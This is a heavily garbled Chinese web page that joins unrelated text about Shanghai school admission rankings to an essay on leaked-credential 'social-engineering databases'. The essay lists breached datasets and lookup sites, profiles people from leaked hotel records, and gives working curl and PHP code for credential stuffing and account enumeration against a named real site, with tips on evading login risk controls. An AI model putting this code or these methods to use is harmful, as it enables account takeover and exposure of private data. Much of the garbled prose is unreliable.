社会群工库随想

201陆法国巴黎普通高中初级中学结束学业生升学考试录取分数线全市排名意况大汇总

 

  图片 1

  │点│击│湖蓝字体│关│注│作者│们│哦│

  大大提示:

  这不是“高级中学排名榜”,而是高校的零志愿录取意况总结,反映的是各大高级中学在各区得到生源的质感。对于三年后的高等学校统一招生考试,影响相当大。我们得以三年后等候!

文│家长帮新加坡站

编辑│朱大大

© 公众号转发请表明出处

/

大大说:点击图片能够看来清晰的大图呢!

  图片 2

  图片 3

  图片 4

  图片 5

  图片 6

  图片 7

  图片 8

  图片 9

? 我们可以观察录取分数线排在前十的许多都是根源浦东、杨浦、徐汇等区。

浦东是本校、人数最多的区,而杨浦和徐汇是守旧的教诲大区。那也能够从侧面反应那一个区的考生就算摘取越来越多,不过面临的下压力也越来越大。

? 浦东的建平、进才、上实等学堂的录取分数线碾压别的区重点学院和学校。三年后的高等学校统招考试,我们拭目以俟吧!

?今年的分数线也表达了二零二零年的考试难度全体十分小高分层占比一点都不小,尤其是在浦东那一个大区,表现出来的一点便是区重录取分数高、分数线差别小。

 

 

 

 

 

 

二零一四北京高中50强排行报告出炉 四大著名高校重新定义?

 

图片 10

  20一5巴黎高等学校统一招生考试停止,坊间流传一份“20一伍北京高级中学50强告诉,貌似数据解析“言之凿凿”,其实谬之千里。

  那份“榜单”根据的是刚刚公告的20一5年武大高校、上海清华在沪综合评价录取考生数量。总结显示,二〇一玖年东京拿走两校综合评价录取人数最多的“10强中学”依次为:东京中学(135人),华东中医药大学二附属中学(13陆人),复旦附属中学(九十七位),7宝中学(玖三位),哈工大附属中学(78个人),南洋模范中学(陆5个人),建平中学(61位),汉中中学(3九位),进才中学(3三人),控江中学(2十九位)。

  “四大有名高校变脸说”或言之太早

  和二〇一八年的榜单相比较,在“宝塔尖”部分,上中继续“称霸”,但霸主地位受到华二挑战;清华附属中学型小型升,且北大录取人数8九名系10年来次高(稍低于20十年的玖五位);最感动的扭转是7宝中学以十分的大的异样超越南开附属中学,第一遍站上全市第陆!

  “新加坡应有重新定义‘四大有名高校’了。”坊间有舆论在比对了2018年的一模同样排行后提出,上中虽继续“称霸”,但霸主地位蒙受华东师大二附属中学的挑战;浙大附属中学型小型幅上涨,最感动的成形是7宝中学第1次位列全市第伍的职位。对此,7宝中学校长仇忠海认为,那是对北京高中教育的惨重误读。“那只是个民间排行,是独家好事者按自身希望做出的不得法排行。”仇校长说,在人民心中早已产生的“四大名校”,其身价是麻烦撼动的。“四大名校”已产生东京高级中学等教育育的3个重中之重品牌,没需要去改动。仇校长还提议,考量1所学院和学校最主要的不是看有多少学生考取了名牌大学,而要看其内涵发展,看它培养的学习者所全部的人文素养与立异技术。而那恰是立时众多“排名”所欠缺的。

  “7宝中学在规模上得以说是东京的‘一级中学’。”有校长分析,七宝中学合法通知今年在座高等高校统招考试的有4410位,而清华附属中学本届本部招生总布置为400人,扣除出国人数后,二〇一九年实在到位高等高校统招考试者估摸有数3七15位。由此,若是以“产出比”计,交令月七宝当下能够说是旗鼓分外,“比不上用‘中国共产党第五次全国代表大会名校’的定义更审慎。”

  但也有不愿揭破姓名的圈老婆士表示,历年总计标准化一致,而二〇一九年排名变动,多少反映某个主题材料。“据小编所知,7宝的壹本率比‘第四次全国代表大会有名高校’中的有个别高校还要高。”

  “上上下下”变动十分大

  “六、叁、一”的选定新法则以高等高校统招考试分数占“大头”,不少人考前即预测二零一玖年各大高级中学或重新洗牌。数据展现,今年沪上高级中学在浙大、武大自主招生榜单上的位次确实改换不小。

  和二〇一八年的榜单比较,今年进步较为强烈的学院和学校有:位育中学、奉贤中学、进才中学、复兴高中等。

  位育中学在经历了两年的低谷(2013年第一八名、201四年第二三名)后,二零一玖年退回前15名。“立奇功”的是浙大预录取十三个人,位居全市第十,自200八年来讲首度重回全市前10。

  奉贤中学继二〇一八年“井喷”后,二〇一九年勇往直前“摸高”,排名已追至全市第3几人,在本榜单上第四回且大幅度超越松江二中,不仅荣登“桐城市王”的宝座,也压过了繁多老牌市重点中学。作为1所远郊中学,奉贤中学(本地人称“县立中学”)已改为巴黎“守旧打法”的代表型高校。

  在大规模回落中,进才中学二零一9年1本率逆势上扬,创下八陆%的史上最棒成绩,在清华、复旦以高等学校统招考试战绩为内核的“新自招”中亦占得优势。

  复兴高中二〇一八年喊出了“三回创业”、“重归一级高校行列”等口号,在就职业学校长陈永平的领军下,二零一玖年的数量“止跌企稳”,特别在哈工业余大学学自主招收上回来全市第10,是自201一年而言的最好战表。

  曹杨第22中学近三年在本榜单上的排序分别为第玖、拾、1一名,而且二〇一九年一本率当先捌3%,显示这个学院已基本享有“全市前10”的汇总实力。市北中学也承袭接保险险小幅度上升的神态,紧咬曹杨第22中学不放。在王洋女士、陈军两位“少壮派”校长领军下,两校已改为新加坡北片高中的“双子星座”。

  四大盛名高校的萧县分校也有一对在今年终登榜单。当中,浙大附属中学嘉定分校位居第3玖名(学生规模1陆拾一位),浦东南开附属中学分校位列第18名(学生规模八12位),华东地质大学2附属中学紫竹校区排行第20(学生规模八十人)。

  在黄浦、卢湾并区后的“新黄浦叁强”的争夺霸权战中,本榜单二〇一二年“大、格、向”,20一3年“格、大、向”,201肆年“向、大、格”,二〇一玖年则是“向、格、大”——玉林中学排位“暴跌”20名,首度垫底。而在三年前,这个学院投档分数线系全区率先(临汾584、格致58二、向明57玖.五)。从那一数据看,向明中学人才作育的“加工工夫”优良。相关数据会否撬动二〇一八年的黄浦中考分数线情势,值得关切。

  别的,松江第22中学、吴淞中学、闵行中学等校也有比很大的消沉。

  北京中学界的“神明”上国戏剧大学附属中学继二零一八年在本榜单骤降至第壹九个人后,二零一9年保持在第一八名,注解校园学生的“主战地”确已进一步远隔国内高等高校统招考试。

 

 

 

 

http://sh.zhongkao.com/shgz/

 

 

 

 

 

 

 

“社会群工库”这几个词很五个人并不目生,而且也有更扩张的消息发轫谈起社会群众工作库,比如:
一.
2016年四月,四川许昌公安机关互联网安全护卫部门成功侦查破案一齐侵袭公民个人音讯案,抓获犯罪狐疑人8名,捣毁国内最大的互连网社会群工库“K八社会群工库”(www.k8sec.com),搜查缴获公民个人音信20亿条。
二.
201陆年1月,南都记者700元就买到同事行踪,包蕴乘机、开房、上网吧等11项记录,很许多据源自社会群工库。

社会群工库这一个行业链平昔非常的热烈,然而国家也在打击,搜索“社会群工库”,你会发现它是个敏感词。

声称:请勿使用社会群工库从事地下职业,本篇小说仅提供就学座谈。

图片 11 

在谈社工库此前,大家先说说哪些是社会群工(即社会工程学),有多少个社会工程学的概念供给明白:
1. 社会工程学攻击都创制在使人商定发生体味偏差的基本功上,熟知的社会工程师都以善于举办音信搜罗的肉体力行者。
二.
社会工程学是1种通过对事主激情缺陷、本能反应、好奇心、信任、贪婪等心思陷阱举行诸如期骗、加害等有毒手腕。
叁.
社会工程学是1种黑客攻击艺术,利用哄骗等招数骗取对方信任,获取机密音讯。
4.
社会工程学是一种采纳人性脆弱点、贪婪等等的激情表现张开抨击,是防不胜防的。

社会工程学本来是一门学问,可是因为所做的作业基本上是不佳的,所以这几个词渐渐变成了贬义词,甚至被以为“违背了特性的德行”。

i春秋有①篇帖子在探讨社会工程学:

您怎么对待黑客的社会工程学?

自个儿以为,高贵了说,社会群工是1门艺术,垄断(monopoly)人的点子。假如说“违背了本性的德性”,那么大多家长诈欺小孩,利诱小孩,未尝不是壹种“垄断人心”。社会群工无罪,难点在于攻击小编,固然是爱国、为了保证国家利润而选取社会群工实行攻击,社会群工显著会被感觉“高大上”。

在互连网安全进攻和防守商量中,小编相比较喜欢社会工程学、也相比敬畏社会工程学,比较于其余的常见攻击(比如sql注入),社会工程学有着其本人摄人心魄之处:

  1. 情感
    平日大家接触的越多的是遵照理性的攻击,而社会工程学,笔者感觉起到的功效是认为攻击,。前者,黑客更偏重于智力商数和逻辑,后者更偏重于情商和经历。最直接的例子,暗恋1个妹子,怎么着轰下她?不论怎么攻击,社会群工应该是少不了的,情商越高,发挥社会群工的威力越大。

  2. 效率
    和基于本事相比,社会群工在局地状态下,可以推动更加尖锐的抨击。比如,拿着普及密码暴力破解一位的账号;恐怕速度不如搜罗一下他的基本消息,破解来的更加快。集团筹划了多层崇左防范,珍首主题数据,需求一少有攻破;那么很也许装作一个受了委屈的用户来诈欺客服来博取权力,这种艺术更实惠。

  3. 可能性
    人是繁体的,机器是0一。攻击壹台服务器,结果=攻击者的手艺+服务器的症结,结果早就决定。而社会工程学能够拉动Infiniti大概,今日打响,不意味着后天也不负众望;攻击张叁能学有所成,不意味攻击李四也能学有所成。就连攻击者本身,也是不强烈的,攻击者本人的气象,都或许会影响社工的功成名就与否。与服务器攻击相比较,社会群工的不分明性,笔者觉着更具有艺术感。

  • 社工库

社会群工库,是社会工程学中所用到的数据库。

下边提到了,社会工程学的一个维度就是音讯搜聚,比如钦定三个手提式有线电话机号,就能博取到那么些手提式有线电话机号背后的全数者音信,包罗姓名、邮箱、身份证、籍贯、社交账号等等音信,那些音讯就是社工库。

这几个音讯数量,少则几百万,多则上亿,首要来源是各大商厦的安全漏洞,导致数据被黑客窃取。社会群工库是从2011年开班,显示了产生式拉长,归其缘由,今年有大气的用户数量败露。那是本身获得的音信,二〇一三年就有上亿数据外泄:
201一.0三-多玩游戏网-800万-txt.rar
201壹.03-织梦CMS官方网址数据库-3四万-sql.zip
2011.04-766游戏网-12万-sql.rar
2011.04-IS语音-969万-txt.zip
201一.0四-亚马逊(Amazon)神州购买者消息-20万.zip
二〇一一.0四-凡客诚品买家信息-20万-Excel.zip
201壹.04-当当网买家新闻-10三万-Excel.zip
201一.0四-爱拍游戏网-1100万-txt.zip
2011.0四-猴岛游戏社区-26八三万-txt.rar
201一.05-新加坡市银行大额客户-2一万-xls.rar
2011.05-木蚂蚁-13万-sql.zip
2011.07-土木在线-540万-sql.zip
2011.10-178游戏网-1000万-txt.rar
2011.10-CSDN.NET-600万-sql.rar
2011.10-嘟嘟牛-66277-txt.rar
2011.11-7k7k小游戏-2000万-txt.rar
2011.11-人人网-500万-txt.rar
二零一二.12-天涯社区-伍仟万-txt.rar
201一.1二-Taobao买家商家邮箱-2500万-txt.zip

社会群工库的价值在于查询,固然全体再许多据,而不能够很好的询问,那么很难发挥其价值。所以市面上有众多做社会群众工作库查询的网站。在此之前现身了累累在线社会群工库查询网址,但出于“各种原因”,超过伍加尔各答被关门了。未来亦可访问,超越5捌%都急需FQ使用,那里举几个例证:
https://qun.findmima.com/ 
 —社会群工库更新较及时,涵盖账号、qq等多少个维度
https://haveibeenpwned.com/  —国外有名社会群工库查询网址
http://s.70sec.com/ 
 
    
   —收音和录音数量超越300亿

图片 12 

  • 社会群众工作库价值

一聊起社会群工库、消息外泄,我们都会相比较脑瓜疼,比如千万级饭馆开房数据外泄,导致了有个别家园抵触、甚至离婚。

有些大型社会群工库网址进行过PV的调查,有个风趣的数目,仅供参考,不做其余结论:

  1. 宝强离婚案时期,社会群工库寻找量是平常的伍倍之多。
  2. 度岁前后,社会群工库搜索量是年年最少的时候。
  3. 江山的局地恒定会议时期,网址碰着攻击的次数会强烈居多。

社会群工库的询问新闻,是我们最广泛的利用格局,所以重重黑产做了收取金钱的询问系统。除了消息查询,其实社会群工库还足以被用来做此外有价值的政工,比如对于一些被人爆料出的社会群工库,我们得以做多少解析。大家得以做过多有价值、有意思的业务。

对于千万等第开房多少,繁多都记录了地点,经过采样分析诸多大学生开房,登记的地址都以投机的学堂名字:
东京市衡阳路220号北大高校跃进楼
法国首都市包头路220号浙大博士命科学高校
法国巴黎市武川路7八弄(复旦高校北区学生公寓)
东京市常德路220号南开高校物理楼

图片 13 

小编们可以对地方实行分词,找到各类高校的多少,并进行总括。会发现,东京同济的学员开房比复旦的学员要多,而同济大学嘉定校区又比辽源路校区多。嘉定校区是明光市,而四平路处于繁华黄埔区,通过数据,能够如此感到,市区的学生生活更丰硕,而雨山区的学员更寂寞。和同济对待,武大软禁大概更严俊一些。作为业主,在同济投资一个平价旅舍,可能是二个没有错的挑选。等等。。。风趣吧~

主要python工具:
pandas:数据收罗,分析/清洗,内部存款和储蓄器处理,千万级以内的多寡。 
matploylib,seaborn:用作可视化分析。 
bokeh:地图,热力图,处理大数据量。

再譬如,每年都会有权威机构对周围密码实行计算,海外最大致炮网址国家分布图,等等,那么些也都以从社会群工库科研而来的。甚至有人恶作剧,“社会群工库推进了依照社会的大额解析”。

对此社会群工库的数目解析,有几许必要注意,便是学会清洗数据,比如星座分布那种一般就不可信,因为好些个网址假设用户不填写数据,暗中认可都以四月一日,要是盲目总结,你会发现摩羯座占比最多。

  • 损害之最——撞库

对于厂商来说,社会群工库最大的重伤便是撞库,未有之一。撞库,顾名思义,就是黑客通过社会群工库的已知账号和密码,去模拟登录其余商家网址,最后赢得了一堆能够登入那个网址的数额。

对于账号安全,大多协作社都以丰盛敏锐的,比如博客园数码走漏的音信刚一出来,博客园公共关系就及时随地发布评释说博客园很安全,数据败露和网易无妨,而是黑客从近年来的别的各大集团数目外泄中领到了独具腾讯网信箱账号,结尾又重新宣称微博多么爱护用户安全。

各大公司,当发生账号数据败露的时候,都是尽大概万分撇清关系,再说多个事。

叁个是201四年初,12306网站十几万用户数量走漏,笔者当下特意测试了下,半数以上账号都能够登6。依照道理说,那一个账号只要走漏,应该第一时间冻结这个账号,以防碰到攻击者攻击。而1230陆却不是,不但未有保养那几个受害用户,反倒是第目前间评释本人一向不破绽,这个多少来自别的网址的狐狸尾巴,而用户在1230陆用到了和其他有漏洞网址同样的账号和密码。这就是所谓的“撞库”。

第一个事情,是二〇一八年百度网盘有大气用户投诉,自身的网盘资料被莫名删光,并塞满了日本古装片,疑似数据外泄。一样的难点,厂商处理难题同样的老路————用户们,那和大家百度不要紧,那是黑客通过撞库入侵了你们的账号。你们自个儿的账号密码,曾经在第3方平台走漏过,被口诛笔伐的用户们,你们改密码吗,你们密码不安全。

有些公司数据库败露,公司的装有账号密码被窃取,也正是一手数据(比如京东1贰G数据就是手腕数据),有多少个点要求注意:

  1. 对此黑产来讲特别关键,这里蕴涵了大气的用户的账户和密码。
    二.
    出于广大用户差异网站设置了壹致密码,那几个招数数据,大约能够登入用户注册过的各式网址。
  2. 商家对于团结的数额外泄,要求承担一切专门负责。

再来看所谓的二手数据,什么是2手数据吧?黑客窃取到有个别大型公司的招数数据,用那些数量去模拟登录网址B,将登录成功的多寡举办汇总,获得一堆B网址的账号密码,这么些数据就是②手数据。不要轻视2手数据,因为那一个多少是足以操作B网址用户的,比如百度网盘数据败露、1230陆数码走漏,都属于2手数据。那么二手数据也有多少个特色:

  1. 是花招数据的三个子集,往往数据规模不大,几80000到几百万不等。
  2. 危机性同一手数据1致大,对用户形成深重安全主题材料。
  3. 供销合作社1般不甘于承责,以为是用户自个儿的主题材料。

遵从目前多少外泄,公司攻击来看,每年都有恢宏的②手数据攻击,以及发卖用户音讯和网址资产。

用户在有些网址注册了账号,结果那一个网址上的数量被黑客窃取了,恐怕篡改了,然后网址告知用户“网址很安全”,然则结果是用户被口诛笔伐了。那么对于用户来讲,他的损失什么人来负担?从过去的某些案例来看,这类攻击整个由用户本身承担。那么难点来了,用户稀里纷繁扬扬的被口诛笔伐被损失,还要自身承责,大家都清楚何人做错何人担当,用户做错了何等?

  1. 何人叫用户把各类网址设置成同叁个密码。
  2. 用户不该用本身被公开走漏的密码。

如上回答,正是一对商家的千姿百态,那几个厂家根本就不负义务。
1.
作为用户来说,根本不晓得本身的账号密码已经被泄漏,也从未路子获得本人的账号密码被走漏。
二.
花招数据若是发表,公司、国家都拼了命的删帖、删新闻、关闭败露源,根本不给用户知情权。

综上所述,我以为,无论手法数据、还是2手数据,都应有由协作社协调肩负相应的义务,公司有分文不取有限支撑全体用户的账号数码安全

本人要好做测试,通过社会群工库数据,对某国外社交网址进行撞库,测试结果如下:
100万数量,邮箱和呼应密码
约二.十万信箱,为该网址登记用户
当中一.捌万,撞库成功

也正是说,用十0万社会群工数据,轻易获得社交网址壹.八万的实际用户的账号和密码,风险不小。获得这么些账号之后,小编得以做营销、做推广、发垃圾信息,等等。

再有三个点,不晓得我们注意到未有,二.8万报了名中,有一.八万撞库成功,也正是说有6肆%用户在该网址使用了和社会群工库一样的密码。换句话说,抢先四分之二用户,会在多个网址使用同样密码。终归,让二个用户在区别网址用分歧密码,用户很难记住那么多密码的。

在那么些进度中,目的网址并不设有系统漏洞,可是黑客却足以轻巧窃取大量用户账号,同理可得,对同盟社的祸害程度有多大。

  • 社会群工库攻击演示

此间以i春秋为例子,大家做八个测试攻击,来给我们演示怎么样撞库。整个进度12分简单,大旨点就是抓包。

图片 14 

i春秋的登录curl:

curl ``'https://user.ichunqiu.com/login/signin'

-H ``'Host: user.ichunqiu.com'

-H ``'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0'

-H ``'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'

-H ``'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'

-H ``'Accept-Encoding: gzip, deflate, br'

-H ``'Referer: [url]https://user.ichunqiu.com/login?s=bbs&r=http%3A%2F%2Fbbs.ichunqiu.com%2Fportal.php'``[``/url``]

-H ``'Cookie: __jsluid=976fa33f9dadc6a6cdcfcf4fedac6a2e; pgv_pvi=5174663168; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_9104989ce242a8e03049eaceca950328=1487724876,1487819978,1488156372,1489480870; Hm_lvt_1a32f7c660491887db0960e9c314b022=1487752132,1488156372,1488761264,1489366264; browse=CFlaTxUYU0xdWBtPX0hTV1tTWUJDQVpYWVRIRFlLWURTUF5XVRhTQF5UWkBVAlNEUFlKR15AXlhZUEVFV1FYRVNRWk9eREtOFA; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1489563769; pgv_si=s1121205248; Hm_lpvt_9104989ce242a8e03049eaceca950328=1489563769; ci_session=8cde5cded8fd1e220ac3d58eb4efb4ae33a45c12'

-H ``'Connection: keep-alive'

-H ``'Upgrade-Insecure-Requests: 1'

-H ``'Content-Type: application/x-www-form-urlencoded'

--data ``'username=name%40mail.com&password=111111&yzm='

终极的data正是post的传参,包蕴账号和密码。经过测试,发现i春秋做了奇特处理,若是只改data的账号和密码,尽管传递的是未可厚非账号密码,也不会登入成功。经过排查,最后承认,i春秋的登录,除了账号和密码,还和ci_session有提到,而其他的始末都足以去除,最终简化成:

[Bash shell] 纯文本查看 复制代码

?

1
2
3
curl 'https://user.ichunqiu.com/login/signin'
-H 'Cookie: ci_session=8cde5cded8fd1e220ac3d58eb4efb4ae33a45c12'
--data 'username=name%40mail.com&password=111111&yzm='

双重测试发现,相同ci_session,登录不相同的账号,无法得逞,也正是说3个ci_session只好用来登入一个账号。那么怎么着协会三个实惠的session呢?很简单,模拟访问贰遍登录的网页就可以。最终模拟登入的代码如下:

[PHP] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
<?php
function get_session()
{
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL, 'https://user.ichunqiu.com/login/signin');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0');
        curl_setopt($ch, CURLOPT_COOKIE, '__jsluid=976fa33f9dadc6a6cdcfcf4fedac6a2e; pgv_pvi=5174663168; chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_9104989ce242a8e03049eaceca950328=1487724876,1487819978,1488156372,1489480870; Hm_lvt_1a32f7c660491887db0960e9c314b022=1487752132,1488156372,1488761264,1489366264; uid=NcjxQpwhMpDiEc3hKujnFqoieuTE0NWtj; browse=CFlaTxUYU0xdWBtPX0hTV1tTWUJDQVpYWVRIRFlLWURTUF5XVRhTQF5UWkBVAlNEUFlKR15AXlhZUEVFV1FYRVNRWk9eREtOFA; Hm_lpvt_1a32f7c660491887db0960e9c314b022=1489482188; pgv_si=s1121205248; ci_session=1ec3b928692283db3052ee77534c38f735b739ca; Hm_lpvt_9104989ce242a8e03049eaceca950328=1489482188');
        $output = curl_exec($ch);
        if(false == $output)
        {
                echo 'session error';
                return false;
        }
        preg_match('/ci_session=(.*?);/', $output, $match);
        if(!$match[1])
        {
                echo 'session error';
                return false;
        }
        return $match[1];
}
 
function login($account, $password)
{
        $session = get_session();
        if(!$session)
        {
                return false;
        }
        $data = http_build_query(array('username' => $account, 'password' => $password, 'yzm' => ''));
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL, 'https://user.ichunqiu.com/login/signin');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HEADER, 1);
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0');
        curl_setopt($ch, CURLOPT_COOKIE, "ci_session=$session;");
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $output = curl_exec($ch);
        if(strpos($output, '302 Found'))
        {
                return true;
        }
        else if(strpos($output, '200 OK'))
        {
                return false;
        }
        else
        {
                echo 'login error';
                return false;
        }
}
#login($account, 'your password');

采取已知社工库,实行测试,流程通的!能够登入i春秋的账号数据,十二分少,那简单精晓,毕竟ichunqiu受众用户就分外少,如图,密码小编打了德雷斯顿克。能够登入的账号,打字与印刷了人人皆知的ok!!!!!

图片 15 

  • 优化攻击进步功效

刚才谈起了,利用社会群工库攻击i春秋,须要发送三次呼吁,1遍是渲染登入页面获得session,一遍是带着session和社会群工库账号登入。

这多少个请求相当的慢!!!平均二秒到3秒本事爆破1个账号,就算写多线程,也是很没用的。

哪些优化?

广大商铺除此而外提供登录,为了用户体验,往往还提供了一个第一接口:检查账号是不是为已注册账号。在社会群工库攻击中,这么些接口有器重大的地位,因为:
1.
检查账号接口,由于不要求相配密码,去除了加密及比较流程,接口速度比十分的快。
平均攻击速度,从秒级形成微秒级。

  1. 此接口,可以帮助大家筛选出哪些是登记账号,哪些是非注册账号。
    十0万的社会群工库,赶快筛选出适合爆破的几万社会群工库。
  2. 我们只对登记账号实行效仿登录,最大限度的回落了密码爆破的次数。
    貌似,公司会对登录做安全风控,而缩减登录的频次,能够绕过商厦安全检测。

i春秋的账号检查测试,在此间:
图片 16 

检查实验代码如下:

[PHP] 纯文本查看 复制代码

?

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
<?php
function check($account)
{
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL, 'https://user.ichunqiu.com/registerCtl/chkmail');
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_NOBODY, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        $data = http_build_query(array('email' => $account));
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        $output = curl_exec($ch);
        if('false' == $output)
        {
                return false;
        }
        return true;
}
#check('name@mail.com');

优化后的流程是:

  1. 检查评定账号是还是不是为注册账号。
  2. 做客登入页面,获取session。
  3. 带着session,账号,密码,模拟登录i春秋。
  4. 笔录登录成功的社会群工库。

什么样,社会群工库利用格外轻巧吧。

评释:为了爱抚i春秋,幸免形成安全风险。仅尝试了四个以内的邮箱爆破成功,其余爆破均采纳假账号,并未有猎取其余实质数据。

其它,还有哪些路径增添攻击的频率和成功的票房价值呢?那里不做深远实行,给四个思路:
一.
用csdn的社会群众工作库,爆破i春秋,比用天涯社区的社会群众工作库爆破,成功率越来越高。csdn和i春秋,交集更加大,道理很粗大略么!

  1. i春秋的qq群,正是很好的qq社会群工库筛选标准,你知道。

以i春秋的郑国群为例子,群里有1340多个人。

图片 17 

透过测试,当中4七十五个qq邮箱,为i春秋的登记账号。
图片 18 

那么些账号中,共设有*(敏感词)个账号能够被破解:

  1. 30+个账号,使用了相应的社会群工库密码
  2. 10+个账号,使用top10弱密码。
  3. 10+个账号,使用了ichunqiu、chunqiu等首要词作者为密码。
  4. 伍+个账号,使用了qq号码、qq名字作为密码。

上边包车型大巴消息,你,信么?

信不信无所谓,别等到退潮的时候,才通晓本人在裸泳。

总之:

  1. 社会群工是一门艺术,咱们不要无脑的使用社会群工库。
    二.
    提升本人的账号、密码安全意识,减弱被社的可能率。

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图